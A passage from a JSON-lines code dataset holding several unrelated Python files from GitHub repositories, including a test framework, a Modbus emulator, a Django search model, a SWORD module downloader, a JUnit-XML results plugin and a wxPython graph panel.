AfterMethod(TestFixture):\n def __init__(self, test_case: TestCase, test_fixture_ref):\n TestFixture.__init__(self, test_case, test_fixture_ref, PDecoratorType.AfterMethod)\n self.test_case = self.context\n self.test_group = self.test_case.test_group\n self.test_class = self.test_case.test_class\n self.test_suite = self.test_case.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_case.full_name, self.fixture_type.value)\n self.always_run = test_fixture_ref.__always_run__\n self.group = test_fixture_ref.__group__\n\n\nclass AfterGroup(TestFixture):\n def __init__(self, test_group: TestGroup, test_fixture_ref):\n TestFixture.__init__(self, test_group, test_fixture_ref, PDecoratorType.AfterGroup)\n self.test_group = self.context\n self.test_class = self.test_group.test_class\n self.test_suite = self.test_group.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_group.full_name, self.fixture_type.value)\n self.always_run = test_fixture_ref.__always_run__\n self.group = test_fixture_ref.__group__\n\n\nclass AfterClass(TestFixture):\n def __init__(self, test_class: TestClass, test_fixture_ref):\n TestFixture.__init__(self, test_class, test_fixture_ref, PDecoratorType.AfterClass)\n self.test_class = self.context\n self.test_suite = self.test_class.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_class.full_name, self.fixture_type.value)\n self.always_run = test_fixture_ref.__always_run__\n\n\nclass AfterSuite(TestFixture):\n def __init__(self, test_suite: TestSuite, test_fixture_ref):\n TestFixture.__init__(self, test_suite, test_fixture_ref, PDecoratorType.AfterSuite)\n self.test_suite = self.context\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_suite.name, self.fixture_type.value)\n self.always_run = test_fixture_ref.__always_run__\n\n\ndefault_test_suite = TestSuite(\"DefaultSuite\")\n","repo_name":"KarlGong/ptest","sub_path":"ptest/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":18746,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"1034411285","text":"import sys\n\nn, k = map(int, sys.stdin.readline().split())\narr = list(map(int, sys.stdin.readline().split()))\n\nresult = 0\npage = 1\nstorage = []\n\nfor i in arr:\n for j in range(1,i+1):\n if len(storage) == k:\n storage = []\n page = page + 1\n storage.append(j)\n if j == page:\n result = result + 1\n page = page + 1\n storage = []\n\nprint(result)","repo_name":"JeongHooon-Lee/Hackerrank_Python","sub_path":"Easy/After 157/182.Lisas Workbook.py","file_name":"182.Lisas Workbook.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27437691849","text":"from django.contrib.postgres.indexes import GinIndex\nfrom django.contrib.postgres.search import SearchVectorField\nfrom django.db import models\nfrom django.urls import reverse\n\n\nclass FTSReview(models.Model):\n productId = models.CharField(max_length=200, db_index=True)\n userId = models.CharField(max_length=200, db_index=True)\n name = models.CharField(max_length=200)\n review_help_total = models.PositiveIntegerField()\n review_help_help = models.PositiveIntegerField()\n review_score = models.FloatField()\n review_time = models.DateTimeField()\n review_summary = models.TextField()\n review_text = models.TextField()\n\n review_index = SearchVectorField(null=True)\n class Meta:\n indexes = 
[GinIndex(fields=[\"review_index\"])]\n\n    def get_absolute_url(self):\n        return reverse('search:review_detail', args=[self.productId, self.userId])\n\n\n","repo_name":"stbaercom/djangocon_eu_2020_searchoptions","sub_path":"django_search_talk/django_search_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"29492948782","text":"import sys, pygame\nfrom levels.redspace import RedSpace\nfrom levels.bluespace import BlueSpace\nfrom levels.worldnames import WorldNames\n\nfrom ship import Ship\n\nscreen = None\ngame_assets = []\nGAME = None\n\ngame_worlds = []\n\n# Global Constants\nw = 600\nh = 600\n\nclass Game(object):\n    def __init__(self):\n        self.width = 2000\n        self.height = 2000\n        self.screen_width = w\n        self.screen_height = h\n        self.offset = {'x': 0, 'y': 0}\n        self.safe_zone = [{'x': 0, 'y': 0}, {'x': 400, 'y': 400}]\n        self.player = Ship(self)\n\n        game_worlds.append(RedSpace(self, {'x': self.width, 'y': self.height}))\n        game_worlds.append(BlueSpace(self, {'x': self.width, 'y': self.height}))\n\n        self.current_level = game_worlds[0]\n\n    def draw_assets(self):\n        if screen is None:\n            return\n\n        self.current_level.draw(screen)\n        self.player.draw(screen)\n\n    def set_offset(self, x, y):\n        self.offset = {'x': x, 'y': y}\n\n    def update_assets(self):\n        self.player.update()\n        self.current_level.update()\n\n    def change_level(self, level, player_loc=None):\n        self.current_level = self.get_worlds_list()[level]\n        if player_loc is None:\n            self.player.loc = {'x': 100, 'y': 100}\n        else:\n            self.player.loc = {'x': player_loc['x'], 'y': player_loc['y']}\n    def check_collisions(self, obj):\n        for item in self.current_level.game_assets:\n\n            # Optimisation: don't figure out collisions for an object that's nowhere near\n            if not (max(item.loc['x'],obj.loc['x']) - min(item.loc['x'],obj.loc['x'])) \\\n                    > self.screen_width/2:\n\n                if item.check_collision(obj):\n                    obj.has_been_hit(item)\n                    return True\n\n        return False\n\n    def get_worlds_list(self):\n        return game_worlds\n\n\nif __name__ == '__main__':\n    # Main game loop\n    pygame.init()\n\n    size = (w, h)\n    from pygame.locals import *\n    flags = DOUBLEBUF\n\n    screen = pygame.display.set_mode(size, flags)\n\n    Quit = False\n    GAME = Game()\n\n    while Quit is not True:\n        GAME.update_assets()\n        GAME.draw_assets()\n\n        pygame.display.flip()\n\n        for event in pygame.event.get():\n            if event.type == pygame.KEYDOWN:\n                key = event.key\n                if event.key == pygame.K_ESCAPE or event.key == pygame.K_q:\n                    Quit = True\n","repo_name":"filtoid/ld30","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"14764558561","text":"if __name__ == \"__main__\":\n    #First example in exercises\n    li = [3, 6, 2, 7]\n    li = [elem*2 for elem in li if (elem % 2 == 0)]\n    print(li)\n    #Second example in exercises\n    list_ex1 = [('a', 1), ('b', 2), ('c', 7)]\n    lc_list_ex1 = [n*3 for (x, n) in list_ex1]\n    print(lc_list_ex1)\n    #My example\n    li1 = [3, 2, 4, 1]\n    li2 = [elem * 2 for elem in [item + 1 for item in li1]]\n    print(li2)\n    #Another example\n    list_of_lists = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\n    print(list_of_lists)\n    for list in list_of_lists:\n        print(list)\n        for x in list:\n            print(x)\n    #Third example in exercises\n    def subtract(a, b):\n        return a - b\n    oplist = [(6, 3), (1, 7), (5, 5)]\n    result = [subtract(b, a) for (a, b) in oplist]\n    print(result)\n    #Nested List Comprehension\n    list_nested = [3, 2, 4, 1]\n    list_nested_res = [elem*2 for elem in\n                       [item+1 for item in list_nested]]\n    print(list_nested_res)\n    #Example for creating matrix with List Comprehension\n    list_1_10 = [i for i in range(10)]\n    list_example_matrix = [[j+1 for j in range(3*i, 3*i+3)] for i in range(3)]\n\n    n = 5\n    matrix = [[0 for j in range(n)] for i in range(n)]\n    print(list_1_10)\n    print(list_example_matrix)\n    print(matrix)","repo_name":"StefBelcev/PythonCourse","sub_path":"exercises/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"73948241444","text":"#!/usr/bin/env python3\n'''\nModbus Server: emulates devices serving data over the Modbus protocol\nimplemented:\n    +\ndata for the address space: scada_config.MBServerAdrMap\nalgorithm in STATES {'N/A':{'result':(A,B),'length':(C,D)}...\n    { state:{sensor_value:random int in range A,B, segment_length:random int in range C,D}}\ndata updated every UPDATE_PERIOD seconds\n'''\nimport asyncio\nimport sys\nfrom random import randint\n\nif sys.platform == 'win32':\n    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy()) # if running under Windows\n\nimport importlib\n\nimport globals\nfrom classes.channels import Node\n\nscada_config=importlib.import_module('projects.'+globals.PROJECT['path']+'.scadaconfig')\nfrom exchangeserver import ModbusExchangeServer\n\nSTATES={ 'N/A':{'result':(None,None),'length':(20,200)},\n        'Off':{'result':(0,0),'length':(5,20)},\n        'Stand':{'result':(10,20),'length':(5,50)},\n        'Work':{'result':(70,90),'length':(20,100)}\n        }\nUPDATE_PERIOD:float= 1 #update period in seconds\n\nclass Source():\n    def __init__(self,id,addr,regCount,format,function) -> None:\n        self.id=id\n        self.addr =addr\n        self.regCount =regCount\n        self.format =format\n        self.function =function\n    def __str__(self) -> str:\n        return self.id\n\nclass NodeEmulator(Node):\n    state:int = None\n    length:int = None\n    counter:int = 0\n\n    def __str__(self):\n        return super().__str__() + f'state:{self.state} len:{self.length}'\n\ndef nodesInit(configSources, configNodes):\n    sources=[Source(source['id'],\n                    # ip=source['ip'],\n                    source['address'],\n                    source['regCount'],\n                    source['format'],\n                    # port=source['port'],\n                    source['function']\n                    ) for source in configSources]\n\n    nodes=[NodeEmulator(id=node['id'],moduleId=node['moduleId'],type=node['type'],sourceIndexList=node['sourceIndexList']) for node in configNodes]\n    for node in nodes:\n        node.state=list(STATES.keys())[randint(1,3)]\n        node.length=randint(STATES.get(node.state)['length'][0], STATES.get(node.state)['length'][1])\n        try:\n            node.source=next(filter(lambda source:source.id==node.sourceId, sources))\n        except StopIteration:\n            node.source=None\n        # print(node)\n    return nodes\n\ndef MBServerInit(MBServerParams, MBServerAdrMap):\n    print('Address mapping:')\n    for unit in MBServerAdrMap:\n        print (f'Unit:{unit.get(\"unit\")}')\n        for name, regs in unit.get('map').items():\n            print(f'    {name}')\n            for reg in regs:\n                print(f'        id:{reg.get(\"id\")}, address:{reg.get(\"addr\")}, type:{reg.get(\"type\")}')\n    return ModbusExchangeServer(MBServerAdrMap, MBServerParams['host'], MBServerParams['port'])\n\nasync def aSleep(pause):\n    await asyncio.sleep(pause)\n\ndef mainLoop(nodes, MBServer): \n    print ('loop start')\n    MBServer.start()\n    try:\n        while True:\n            for node in nodes:\n                node.result=randint(STATES.get(node.state)['result'][0], STATES.get(node.state)['result'][1])\n                node.counter+=1\n                if node.counter>= node.length:\n                    node.counter=0\n                    newStateIndex=randint(1,3)\n                    while abs(newStateIndex-list(STATES.keys()).index(node.state))>1:\n                        newStateIndex=randint(1,3)\n                    node.state=list(STATES.keys())[newStateIndex]\n                    node.length=randint(STATES.get(node.state)['length'][0], STATES.get(node.state)['length'][1])\n                MBServer.setValue(node.id, node.result)\n            asyncio.run(aSleep(UPDATE_PERIOD))\n    except KeyboardInterrupt:\n        print ('server stopping...')\n        MBServer.stop()\n        print ('server stopped')\n        return\n\ndef main():\n    print ('*'*40)\n    print ('*'+' '*38+'*')\n    print ('*'+' '*12+''+'Modbus EMULATOR'+' '*11+'*')\n    print ('*'+' '*38+'*')\n    print ('*'*40)\n    print (f\"ip:{globals.MBServerParams_E['host']}, port:{globals.MBServerParams_E['port']}\")\n\n    nodes = nodesInit(scada_config.ModuleList, scada_config.channelsConfig.get('nodes'))\n    MBServer = MBServerInit(globals.MBServerParams_E,scada_config.MBServerAdrMap)\n    mainLoop(nodes, MBServer)\n\nif __name__=='__main__':\n    main()","repo_name":"IgorVDubov/gather_old","sub_path":"mb_emulator.py","file_name":"mb_emulator.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"43612624188","text":"\"\"\"Schema constants.\"\"\"\r\n# Schema fields\r\nSCHEMA_DTYPE = \"dtype\"\r\nSCHEMA_REQUIRED = \"required\"\r\nSCHEMA_DEFAULT = \"default\"\r\n\r\n# Data Types\r\nDTYPE_STRING = \"string\"\r\nDTYPE_INT = \"int\"\r\nDTYPE_FLOAT = \"float\"\r\nDTYPE_BOOL = \"bool\"\r\nDTYPE_LIST = \"list\"\r\nDTYPE_DICT = \"dict\"\r\nDTYPE_SET = \"set\"\r\nDTYPE_TUPLE = \"tuple\"\r\nDTYPE_URL = \"url\"\r\nDTYPE_IP = \"ip\"\r\n","repo_name":"gauri-sacumen/Connector_First_Repo","sub_path":"venv/lib/python3.10/site-packages/sac_configurations/constants/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"43736415296","text":"\n#This is the file from which the watermark is to be retrieved\n\nimport sys\n#control variable\nmu = int(sys.argv[1])\ni1 = 1\ni2 = 2\nx1 = 30\nx2 = 25\n#watermark\ny1 = int(sys.argv[2])\ny2 = int(sys.argv[2])\n\nwhile y1 > 1:\n    if y1 % 2 == 1:\n        y1 = y1 * 3 + 1\n    else:\n        y1 = y1 / 2\nif x1 + y1 < 32 and x1 - y1 > 28:\n    print('we are inside watermarked block1')\n\nwhile y2 > 1:\n    if y2 % 2 == 1:\n        y2 = y2 * 3 + 1\n    else:\n        y2 = y2 / 2\nif x1 + y2 < 29 and x1 - y2 > 25:\n    print('We are inside watermarked block2')\n\n#Fluff Code\nx = 14\nwhile x > 2:\n    if x % 2 == 0:\n        x += 1\n    else:\n        x -= 5\ny = 43\nwhile y > 2:\n    if y % 2 == 0:\n        y += 1\n    else:\n        y -= 5\nz = 37\nwhile z > 2:\n    if z % 2 == 0:\n        z += 1\n    else:\n        z -= 5\n","repo_name":"vivekingithub/Xmark-Python","sub_path":"RedInput.py","file_name":"RedInput.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"72996177446","text":"import os\nimport shutil\nfrom urllib import request\nimport tarfile\nimport configparser\nfrom ftplib import FTP\n\nclass RepoManager:\n    local_path = \"~/.sword\"\n    default_repo_server = \"ftp.crosswire.org\"\n    default_repo = \"/pub/sword/raw\"\n    def __init__(self,local_path,default_repo,default_repo_server):\n        self.default_repo = default_repo\n        self.default_repo_server = default_repo_server\n        self.local_path = local_path\n    def prep_local_repo(self):\n        try:\n            os.makedirs(os.path.join(self.local_path,\"mods.d\"))\n        except:\n            print(\"Directory exists\")\n        self.grab_unpack_mod_confs(self.default_repo_server, self.default_repo)\n    def grab_unpack_mod_confs(self,repo_server,repo):\n        repo_path = os.path.join(self.local_path,\"Repositories\",repo_server,*repo.split('/'))\n        print(repo_path)\n        os.makedirs(repo_path)\n        tarfile.open(self.pull_repo_mods_tar(repo_server,repo)).extractall(repo_path)\n        #tar gunzip bra\n    def pull_repo_mods_tar(self,repo_server,repo):\n        return self.pull_ftp_tar(\"ftp://{}{}/{}\".format(repo_server, repo,\"mods.d.tar.gz\"))\n    def pull_ftp_tar(self,uri):\n        destination = os.path.join(self.local_path,\"mods.d.tar.gz\")\n        print(uri)\n        request.urlretrieve(uri, destination)\n        return destination\n    def grab_mod(self, repo_server, repo, modulename):\n        path = os.path.join(self.local_path,'mods.d',modulename+'.conf')\n        source_path = os.path.join(self.local_path,\"Repositories\",repo_server,*repo.split('/'),'mods.d',modulename+'.conf')\n        module_info = configparser.ConfigParser()\n        print(source_path)\n        module_info.read(source_path)\n        print(module_info)\n        module_path = module_info[modulename.upper()]['DataPath']\n        \n        down_path = os.path.join(self.local_path, module_path)\n        os.makedirs(down_path)\n        \n        url = self.default_repo+'/'+module_path\n        \n        ftp = FTP(self.default_repo_server)\n        ftp.login()\n        ftp.cwd(\".\"+url)\n        \n        files = ftp.nlst()\n\n        for file in files:\n            request.urlretrieve(\"ftp://{}{}/{}\".format(self.default_repo_server,url,file),os.path.join(down_path,file))\n        shutil.copyfile(source_path,path)\n        return 0\n\n\nrepo = RepoManager(\"/Users/david/temporary/.sword\",\"/pub/sword/raw\",\"ftp.crosswire.org\")\nrepo.prep_local_repo()\nrepo.grab_mod(\"ftp.crosswire.org\",\"/pub/sword/raw\",'drc')","repo_name":"davidmon21/heathen","sub_path":"repomanager.py","file_name":"repomanager.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"39394583143","text":"import argparse\nfrom string import Template\n\nfrom junitparser import Error\nfrom junitparser import Failure\nfrom junitparser import JUnitXml\nfrom junitparser import Skipped\nfrom tcms_api import plugin_helpers\n\nfrom .version import __version__\n\n\nDEFAULT_TEMPLATE = \"${classname}.${name}\"\n\n\nclass Backend(plugin_helpers.Backend):\n    name = \"kiwitcms-junit.xml-plugin\"\n    version = __version__\n\n\nclass Plugin:  # pylint: disable=too-few-public-methods\n    def __init__(self, verbose=False, summary_template=DEFAULT_TEMPLATE):\n        self.backend = Backend(prefix=\"[junit.xml]\", verbose=verbose)\n        self.verbose = verbose\n        # NB: template is defaulted both here and in the argument parser below\n        self.summary_template = summary_template\n\n    def testcase_summary(self, xml_case):\n        \"\"\"\n        This method will generate the TestCase summary which is sent to\n        Kiwi TCMS. It may be overridden for more flexibility!\n        \"\"\"\n        values = {\n            \"classname\": xml_case.classname,\n            \"name\": xml_case.name,\n            \"suitename\": getattr(xml_case, \"suitename\", None),\n        }\n        return Template(self.summary_template).substitute(values)\n\n    def parse(\n        self, junit_filenames, progress_cb=None\n    ):  # pylint: disable=too-many-branches, too-many-locals\n        self.backend.configure()\n\n        for junit_xml in junit_filenames:\n            if self.verbose:\n                print(f\"Parsing {junit_xml} ...\")\n\n            xml = JUnitXml.fromfile(junit_xml)\n            # apparently junit.xml may contain either a <testsuites> tag,\n            # e.g. Katalon Studio\n            if xml._tag == \"testsuites\":  # pylint: disable=protected-access\n                cases = []\n                for suite in xml:\n                    for case in suite:\n                        # Retain the suite name (if present) with each\n                        # testcase.\n                        if suite.name:\n                            case.suitename = suite.name\n                        cases.append(case)\n            # or directly (only 1) <testsuite> tag - nose & py.test\n            else:\n                cases = list(xml)\n\n            for xml_case in cases:\n                summary = self.testcase_summary(xml_case)[:255]\n\n                test_case, _ = self.backend.test_case_get_or_create(summary)\n                self.backend.add_test_case_to_plan(test_case[\"id\"], self.backend.plan_id)\n\n                comment = self.backend.created_by_text\n                if not xml_case.result:\n                    status_id = self.backend.get_status_id(\"PASSED\")\n\n                # note: since junitparser v2.0 the result attribute holds\n                # a list of values b/c pytest can produce files which contain\n                # multiple results for the same test case. We take the first!\n                for result in xml_case.result:\n                    if isinstance(result, Failure):\n                        status_id = self.backend.get_status_id(\"FAILED\")\n                        comment = result.tostring()\n                        break\n\n                    if isinstance(result, Error):\n                        status_id = self.backend.get_status_id(\"ERROR\")\n                        comment = result.tostring()\n                        break\n\n                    if isinstance(result, Skipped):\n                        status_id = self.backend.get_status_id(\"WAIVED\")\n                        comment = result.message\n                        break\n\n                for execution in self.backend.add_test_case_to_run(\n                    test_case[\"id\"],\n                    self.backend.run_id,\n                ):\n                    self.backend.update_test_execution(execution[\"id\"], status_id, comment.decode())\n\n                if progress_cb:\n                    progress_cb()\n\n        self.backend.finish_test_run()\n\n\ndef main(argv):\n    parser = argparse.ArgumentParser(\n        description=\"Parse the specified XML files and \" \"send the results to Kiwi TCMS\"\n    )\n    parser.add_argument(\n        \"-v\",\n        \"--verbose\",\n        dest=\"verbose\",\n        action=\"store_true\",\n        help=\"Print information about created TP/TR records\",\n    )\n    # NB: template is defaulted both here and in the Plugin init method above\n    parser.add_argument(\n        \"--summary-template\",\n        dest=\"summary_template\",\n        type=str,\n        help=\"Template summary from testcase, eg %(default)s.\",\n        default=DEFAULT_TEMPLATE,\n    )\n    parser.add_argument(\"filename.xml\", type=str, nargs=\"+\", help=\"XML file(s) to parse\")\n\n    args = parser.parse_args(argv[1:])\n\n    plugin = Plugin(verbose=args.verbose, summary_template=args.summary_template)\n    plugin.parse(getattr(args, \"filename.xml\"))\n","repo_name":"lasest/junit.xml-plugin","sub_path":"tcms_junit_plugin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"}
{"seq_id":"43447619674","text":"\nimport wx\nfrom math import log, isinf, isnan\nfrom hypotools import *\nfrom hypoparams import *\n\n\n\nclass GraphDisp():\n    def __init__(self):\n        self.numplots = 0\n        self.currentplot = 0\n        self.plots = []\n\n\n    def GetFront(self):\n        return self.plots[0]\n\n\n    def Add(self, plot):\n        self.plots.append(plot)
\n\n    # XYSynch() - Synchronise X and Y axes for all plots\n    def XYSynch(self, plotzero=None): \n        if plotzero == None: plotzero = self.plots[0]\n        \n        for plot in self.plots:\n            plot.yfrom = plotzero.yfrom\n            plot.yto = plotzero.yto\n            plot.xfrom = plotzero.xfrom\n            plot.xto = plotzero.xto\n\n\n\nclass GraphPanel(wx.Panel):\n    def __init__(self, parent, index, size):\n        wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, size)\n        self.numdisps = 0\n        self.frontdisp = 0\n        self.dispset = []\n        self.ostype = GetSystem()\n        self.gsynch = 0\n        self.scalebox = None\n        self.subplot = 0\n        self.settag = \"\"\n        self.mainwin = parent\n        self.index = index\n\n        # Plot Mouse Control\n        self.anchorpos = wx.Point(0, 0)\n        self.overlay = wx.Overlay()\n\n        # Draw Parameters\n        self.xbase = 40\n        self.ybase = 10\n        self.xplot = 500\n        self.yplot = 200\n        self.xstretch = parent.xstretch\n        self.colourpen = parent.colourpen\n        self.SetBackgroundColour(wx.WHITE)\n\n        # Plot Menu Coding\n        self.menuIdPlotMap = {}\n        self.menuIdSetMap = {}\n\n        if self.ostype == 'Mac':\n            self.textfont = wx.Font(wx.FontInfo(10).FaceName(\"Tahoma\"))\n            self.smallfont = wx.Font(wx.FontInfo(8).FaceName(\"Tahoma\"))\n        else:\n            self.textfont = wx.Font(wx.FontInfo(8).FaceName(\"Tahoma\"))\n            self.smallfont = wx.Font(wx.FontInfo(6).FaceName(\"Tahoma\"))\n\n        self.scrollbar = wx.ScrollBar(self, wx.ID_ANY, wx.Point(self.xbase, self.yplot + 35), wx.Size(self.xplot + 50, -1))\n        self.scrollbar.SetScrollbar(0, 40, self.xplot + 40, 50)\n\n        self.Bind(wx.EVT_PAINT, self.OnPaint)\n        self.Bind(wx.EVT_SCROLL, self.OnScroll)\n        self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnErase)\n\n        self.Bind(wx.EVT_RIGHT_DOWN, self.OnRightClick)\n        self.Bind(wx.EVT_MENU, self.OnGraphRemove, ID_GraphRemove)\n        self.Bind(wx.EVT_MENU, self.OnPlotCon, ID_PlotPanel)\n        self.Bind(wx.EVT_MENU, self.OnGridOutput, ID_Output)\n\n\n        self.Bind(wx.EVT_MOTION, self.OnMouseMove)\n        self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)\n        self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp)\n\n\n    def OnGridOutput(self, event):\n        self.mainwin.mod.GridOutput()\n\n\n    def OnPlotCon(self, event):\n        if not self.mainwin.plotcon: \n            self.mainwin.plotcon = PlotCon(self, \"Plot Control\")\n            self.mainwin.toolset.AddBox(self.mainwin.plotcon) \n\n        else: self.mainwin.plotcon.SetGraph(self)\n        self.mainwin.plotcon.Show(True)\n\n\n    def OnLeftUp(self, event):\n        if self.mainwin.plotcon: self.mainwin.plotcon.SetGraph(self)\n\n\n    def OnLeftDown(self, event):\n        pos = event.GetPosition()\n        mousedown = pos\n\n        #if(mainwin->neurobox) mainwin->neurobox->SetGraph(this);\n\n        plot = self.GetFrontPlot()\n        xdiff = plot.xto - plot.xfrom\n        xscale = xdiff / self.xplot\n        xgraph = (mousedown.x - self.xbase) * xscale + plot.xfrom\n\n        ydiff = plot.yto - plot.yfrom\n        yscale = ydiff / self.yplot\n        ygraph = (self.yplot - mousedown.y + self.ybase) * yscale + plot.yfrom\n\n        snum = f\"LDown X {pos.x} Y {pos.y} graph {xgraph} {ygraph}\"\n        #if(mainwin->diagnostic) mainwin->SetStatusText(snum);\n\n        #self.CaptureMouse()\n        self.anchorpos = pos\n        if self.anchorpos.x < self.xbase: self.anchorpos.x = self.xbase\n        if self.anchorpos.x > self.xbase + self.xplot: self.anchorpos.x = self.xbase + self.xplot\n        if self.anchorpos.y < self.ybase: self.anchorpos.y = self.ybase\n        if self.anchorpos.y > self.ybase + self.yplot: self.anchorpos.y = self.ybase + self.yplot\n\n\n    def OnMouseMove(self, event):\n        pos = event.GetPosition()\n\n        if self.mainwin.hypoflags[\"xypos\"]:\n            plot = self.GetFrontPlot()\n\n            # 27/11/20 fixed scaling using adjusted axis unit scales, still need to fix for measure\n\n            xdiff = plot.xto - plot.xfrom\n            xscale = xdiff / self.xplot\n            xgraph = (pos.x - self.xbase) * xscale + plot.xfrom\n            xpos = xgraph * plot.xunitscale / plot.xunitdscale\n            xdata = xgraph / plot.binsize\n            if self.anchorpos.x < pos.x: xmeasure = (pos.x - self.anchorpos.x) * xscale\n            else: xmeasure = (self.anchorpos.x - pos.x) * xscale\n            xplaces = numplaces(xdiff * plot.xunitscale / plot.xunitdscale)\n\n            ydiff = plot.yto - plot.yfrom\n            yscale = ydiff / self.yplot\n            ygraph = (self.yplot - pos.y + self.ybase) * yscale + plot.yfrom\n            ypos = ygraph * plot.yunitscale / plot.yunitdscale\n            if 
self.anchorpos.y < pos.y: ymeasure = (pos.y - self.anchorpos.y) * yscale\n else: ymeasure = (self.anchorpos.y - pos.y) * yscale\n yplaces = numplaces(ydiff * plot.yunitscale / plot.yunitdscale)\n\n #data = plot.GetData(xgraph) * plot.yunitscale / plot.yunitdscale\n\n \n #if self.mainwin.diagnostic: snum.Printf(\"Graph Position X %s Y %s Data %s\", \n # numstring(xpos, xplaces), numstring(ypos, yplaces), numstring(data, yplaces));\n snum = f\"Graph Position X {numstring(xpos, xplaces)} Y {numstring(ypos, yplaces)}\"\n self.mainwin.SetStatusText(snum)\n \n\n if not self.HasCapture(): return\n\n currentpos = pos\n if currentpos.y > self.ybase + self.yplot - 1: currentpos.y = int(self.ybase + self.yplot - 1)\n if currentpos.y < self.ybase + 1: currentpos.y = self.ybase + 1\n if currentpos.x > self.xbase + self.xplot - 1: currentpos.x = self.xbase + self.xplot - 1\n if currentpos.x < self.xbase + 1: currentpos.x = self.xbase + 1\n \n dc = wx.ClientDC(self)\n overlaydc = wx.DCOverlay(self.overlay, dc)\n overlaydc.Clear()\n\n ctx = wx.GraphicsContext.Create(dc)\n ctx.SetBrush(wx.Brush(wx.Colour(192,192,255,64)))\n newrect = wx.Rect(self.anchorpos, currentpos)\n ctx.DrawRectangle(newrect.x, newrect.y, newrect.width, newrect.height)\n \n\n def OnGraphRemove(self, event):\n self.Refresh()\n self.mainwin.RemoveGraph(self)\n\n\n def OnErase(self, event):\n pass\n\n\n def XYSynch(self):\n for graphdisp in self.dispset: \n graphdisp.XYSynch()\n\n\n def ScrollUpdate(self, xmax=0):\n plot = self.GetFrontPlot()\n if not plot: return\n if not np.any(plot.data):\n #mod->diagbox->Write(\"plot \" + plot.gname + \" no data\\n\")\n #return\n max = 1000\n #else: plot.xmax = len(plot.data) / plot.xscale\n else: plot.xmax = plot.data.xmax / plot.xscale\n if plot.xdata != None: \n if xmax: plot.xmax = xmax\n else: plot.xmax = len(plot.xdata)\n\n #plot.xmax = 5000\n\n xdiff = plot.xto - plot.xfrom\n plot.xrel = plot.xfrom - plot.scrollpos # relative adjustment for non-zero xfrom set from scale panel\n if plot.xrel < plot.xmin: plot.xrel = plot.xmin\n\n #scrollxto = int((plot.xmax - plot.xrel) * plot.binsize) - 1\n scrollxto = int((plot.xmax - plot.xrel) * plot.binsize)\n section = int(xdiff)\n if section > scrollxto:\n plot.scrollpos = 0\n\n self.scrollbar.SetScrollbar(plot.scrollpos, section, scrollxto, section)\n #DiagWrite(f\"scrollpos {plot.scrollpos} section {section} scrollxto {scrollxto} section {section}\\n\")\n\n #self.Refresh()\n #overlay.Reset()\n\n\n def OnScroll(self, event):\n xscrollpos = event.GetPosition()\n self.ScrollX(xscrollpos)\n\n\n def ScrollX(self, xpos):\n self.xscrollpos = xpos\n\n for graphdisp in self.dispset:\n plot = graphdisp.GetFront()\n xfrom = plot.xfrom\n xdiff = plot.xto - plot.xfrom\n plot.xfrom = xpos + plot.xrel\n plot.xto = xpos + xdiff + plot.xrel\n self.xf.SetNumValue(plot.xfrom, xdiff)\n self.xt.SetNumValue(plot.xto, xdiff)\n plot.scrollpos = xpos\n\n #text = \"scroll xpos {} xfrom {} xrel {}\".format(xpos, xfrom, plot.xrel)\n #pub.sendMessage(\"status_listener\", message=text)\n\n #if self.gsynch: pub.sendMessage(\"scroll_listener\", graphdisp.index, xpos)\n #else: self.Refresh()\n\n #pub.sendMessage(\"scroll_listener\", index=self.index, pos=xpos)\n self.scalebox.ScrollUpdate(self.index, xpos)\n\n\n def ReSize(self, newxplot, newyplot):\n self.xplot = newxplot\n self.yplot = newyplot\n\n self.scrollbar.SetSize(self.xplot, -1)\n self.scrollbar.Move(self.xbase, int(self.yplot + 35))\n \n #overlay.Reset()\n self.Refresh()\n\n\n def GetFrontPlot(self):\n return 
